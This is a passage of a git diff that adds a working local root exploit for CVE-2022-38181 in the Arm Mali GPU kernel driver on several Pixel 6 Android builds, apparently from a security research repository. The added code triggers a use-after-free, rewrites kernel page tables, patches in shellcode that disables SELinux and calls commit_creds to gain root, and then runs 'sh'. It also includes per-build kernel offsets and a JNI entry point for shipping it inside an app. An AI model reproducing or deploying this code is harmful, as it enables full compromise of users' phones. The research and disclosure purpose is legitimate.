+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ return -1;
+ }
+ return 0;
+}
+
+void* flush(int spray_cpu, int idx) {
+ migrate_to_cpu(spray_cpu);
+ void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (region == MAP_FAILED) err(1, "flush failed");
+ memset(region, idx, FLUSH_SIZE);
+ return region;
+}
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed");
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+uint64_t alias_sprayed_regions(int mali_fd) {
+ union kbase_ioctl_mem_alias alias = {0};
+ alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ alias.in.stride = SPRAY_PAGES;
+
+ alias.in.nents = SPRAY_NUM;
+ struct base_mem_aliasing_info ai[SPRAY_NUM];
+ for (int i = 0; i < SPRAY_NUM; i++) {
+ ai[i].handle.basep.handle = gpu_va[i];
+ ai[i].length = SPRAY_PAGES;
+ ai[i].offset = 0;
+ }
+ alias.in.aliasing_info = (uint64_t)(&(ai[0]));
+ mem_alias(mali_fd, &alias);
+ uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
+ void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap alias failed");
+ }
+ alias_regions[0] = region;
+ for (int i = 1; i < SPRAY_NUM; i++) {
+ void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
+ if (this_region == MAP_FAILED) {
+ err(1, "mmap alias failed %d\n", i);
+ }
+ alias_regions[i] = this_region;
+ }
+ return (uint64_t)region;
+}
+
+void fault_pages() {
+ int read = 0;
+ for (int va = 0; va < SPRAY_NUM; va++) {
+ uint8_t* this_va = (uint8_t*)(gpu_va[va]);
+ *this_va = 0;
+ uint8_t* this_alias = alias_regions[va];
+ read += *this_alias;
+ }
+ LOG("read %d\n", read);
+}
+
+int find_freed_idx(int mali_fd) {
+ int freed_idx = -1;
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = gpu_va[j];
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
+ if (query.out.value != SPRAY_PAGES) {
+ LOG("jit_free commit: %d %llu\n", j, query.out.value);
+ freed_idx = j;
+ }
+ }
+ return freed_idx;
+}
+
+int find_pgd(int freed_idx, int start_pg) {
+ uint64_t* this_alias = alias_regions[freed_idx];
+ for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = this_alias[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ return pg;
+ }
+ }
+ }
+ return -1;
+}
+
+uint32_t lo32(uint64_t x) {
+ return x & 0xffffffff;
+}
+
+uint32_t hi32(uint64_t x) {
+ return x >> 32;
+}
+
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+ uint64_t pc_page = pc >> 12;
+ uint64_t label_page = label >> 12;
+ int64_t offset = (label_page - pc_page) << 12;
+ int64_t immhi_mask = 0xffffe0;
+ int64_t immhi = offset >> 14;
+ int32_t immlo = (offset >> 12) & 0x3;
+ uint32_t adpr = rd & 0x1f;
+ adpr |= (1 << 28);
+ adpr |= (1 << 31); //op
+ adpr |= immlo << 29;
+ adpr |= (immhi_mask & (immhi << 5));
+ return adpr;
+}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+}
+
+int run_enforce() {
+ char result = '2';
+ sleep(3);
+ int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+ read(enforce_fd, &result, 1);
+ close(enforce_fd);
+ LOG("result %d\n", result);
+ return result;
+}
+
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
+ avc_deny = AVC_DENY_2108;
+ sel_read_enforce = SEL_READ_ENFORCE_2108;
+ fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
+ avc_deny = AVC_DENY_2201;
+ sel_read_enforce = SEL_READ_ENFORCE_2201;
+ fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
+ avc_deny = AVC_DENY_2202;
+ sel_read_enforce = SEL_READ_ENFORCE_2202;
+ fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
+ avc_deny = AVC_DENY_2207;
+ sel_read_enforce = SEL_READ_ENFORCE_2207;
+ fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+ avc_deny = AVC_DENY_2211;
+ sel_read_enforce = SEL_READ_ENFORCE_2211;
+ fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+ avc_deny = AVC_DENY_2212;
+ sel_read_enforce = SEL_READ_ENFORCE_2212;
+ fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
+void cleanup(int mali_fd, uint64_t pgd) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+ uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+void spray(int mali_fd) {
+ uint64_t cookies[32] = {0};
+ for (int j = 0; j < 32; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j] = alloc.out.gpu_va;
+ }
+ for (int j = 0; j < 32; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+ for (int j = 32; j < 64; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j - 32] = alloc.out.gpu_va;
+ }
+ for (int j = 32; j < 64; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+}
+
+int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
+ if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
+ err(1, "Out of memory.");
+ }
+ void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+
+ uint64_t jit_pages = SPRAY_PAGES;
+ uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr);
+ atom_number++;
+ mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
+ for (int i = 0; i < NUM_TRIALS; i++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = jit_addr;
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx);
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+ migrate_to_cpu(SPRAY_CPU);
+ spray(mali_fd);
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES);
+ }
+ LOG("region freed %d\n", i);
+
+ uint64_t alias_region = alias_sprayed_regions(mali_fd);
+ fault_pages();
+ LOG("cleanup flush region\n");
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+ uint64_t drain = drain_mem_pool(mali_fd);
+ release_mem_pool(mali_fd, drain);
+
+ jit_free(mali_fd, atom_number, jit_id);
+
+ map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ LOG("jit_freed\n");
+ int freed_idx = find_freed_idx(mali_fd);
+ if (freed_idx == -1) err(1, "Failed to find freed_idx");
+ LOG("Found freed_idx %d\n", freed_idx);
+ int pgd_idx = find_pgd(freed_idx, 0);
+ if (pgd_idx == -1) err(1, "Failed to find pgd");
+ uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
+ LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
+ atom_number++;
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd);
+ return 0;
+ }
+ }
+ LOG("failed, retry.\n");
+ jit_id++;
+ *flush_idx += NUM_TRIALS;
+ return -1;
+}
+
+#ifdef SHELL
+
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ system("sh");
+ break;
+ }
+ }
+}
+#else
+#include
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ LOG("uid: %d euid %d", getuid(), geteuid());
+ return 0;
+ }
+ }
+ return -1;
+}
+#endif
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define pan_section_ptr(base, A, S) \
+ ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+ for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+ *_loop_terminate = (void *) (dst); \
+ __builtin_expect(_loop_terminate != NULL, 1); \
+ ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+ _loop_terminate = NULL; }))
+
+
+static inline uint64_t
+__gen_uint(uint64_t v, uint32_t start, uint32_t end)
+{
+#ifndef NDEBUG
+ const int width = end - start + 1;
+ if (width < 64) {
+ const uint64_t max = (1ull << width) - 1;
+ assert(v <= max);
+ }
+#endif
+
+ return v << start;
+}
+
+static inline uint64_t
+__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
+{
+ uint64_t val = 0;
+ const int width = end - start + 1;
+ const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+
+ for (int byte = start / 8; byte <= end / 8; byte++) {
+ val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
+ }
+
+ return (val >> (start % 8)) & mask;
+}
+
+enum mali_job_type {
+ MALI_JOB_TYPE_NOT_STARTED = 0,
+ MALI_JOB_TYPE_NULL = 1,
+ MALI_JOB_TYPE_WRITE_VALUE = 2,
+ MALI_JOB_TYPE_CACHE_FLUSH = 3,
+ MALI_JOB_TYPE_COMPUTE = 4,
+ MALI_JOB_TYPE_VERTEX = 5,
+ MALI_JOB_TYPE_GEOMETRY = 6,
+ MALI_JOB_TYPE_TILER = 7,
+ MALI_JOB_TYPE_FUSED = 8,
+ MALI_JOB_TYPE_FRAGMENT = 9,
+};
+
+enum mali_write_value_type {
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+};
+
+
+struct MALI_WRITE_VALUE_JOB_PAYLOAD {
+ uint64_t address;
+ enum mali_write_value_type type;
+ uint64_t immediate_value;
+};
+
+struct MALI_JOB_HEADER {
+ uint32_t exception_status;
+ uint32_t first_incomplete_task;
+ uint64_t fault_pointer;
+ bool is_64b;
+ enum mali_job_type type;
+ bool barrier;
+ bool invalidate_cache;
+ bool suppress_prefetch;
+ bool enable_texture_mapper;
+ bool relax_dependency_1;
+ bool relax_dependency_2;
+ uint32_t index;
+ uint32_t dependency_1;
+ uint32_t dependency_2;
+ uint64_t next;
+};
+
+
+static inline void
+MALI_JOB_HEADER_pack(uint32_t * restrict cl,
+ const struct MALI_JOB_HEADER * restrict values)
+{
+ cl[ 0] = __gen_uint(values->exception_status, 0, 31);
+ cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
+ cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
+ cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
+ cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
+ __gen_uint(values->type, 1, 7) |
+ __gen_uint(values->barrier, 8, 8) |
+ __gen_uint(values->invalidate_cache, 9, 9) |
+ __gen_uint(values->suppress_prefetch, 11, 11) |
+ __gen_uint(values->enable_texture_mapper, 12, 12) |
+ __gen_uint(values->relax_dependency_1, 14, 14) |
+ __gen_uint(values->relax_dependency_2, 15, 15) |
+ __gen_uint(values->index, 16, 31);
+ cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
+ __gen_uint(values->dependency_2, 16, 31);
+ cl[ 6] = __gen_uint(values->next, 0, 63);
+ cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
+}
+
+
+#define MALI_JOB_HEADER_LENGTH 32
+struct mali_job_header_packed { uint32_t opaque[8]; };
+static inline void
+MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
+ struct MALI_JOB_HEADER * restrict values)
+{
+ if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
+ values->exception_status = __gen_unpack_uint(cl, 0, 31);
+ values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
+ values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
+ values->is_64b = __gen_unpack_uint(cl, 128, 128);
+ values->type = __gen_unpack_uint(cl, 129, 135);
+ values->barrier = __gen_unpack_uint(cl, 136, 136);
+ values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
+ values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
+ values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
+ values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
+ values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
+ values->index = __gen_unpack_uint(cl, 144, 159);
+ values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
+ values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
+ values->next = __gen_unpack_uint(cl, 192, 255);
+}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
+{
+ fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
+ fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
+ fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
+ fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
+ fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
+ fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
+ fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
+ fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
+ fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
+ fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
+ fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
+ fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
+ const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ cl[ 0] = __gen_uint(values->address, 0, 63);
+ cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
+ cl[ 2] = __gen_uint(values->type, 0, 31);
+ cl[ 3] = 0;
+ cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
+ cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
+}
+
+
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
+
+
+struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
+ values->address = __gen_unpack_uint(cl, 0, 63);
+ values->type = __gen_unpack_uint(cl, 64, 95);
+ values->immediate_value = __gen_unpack_uint(cl, 128, 191);
+}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+ fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+ fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+ uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+ .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
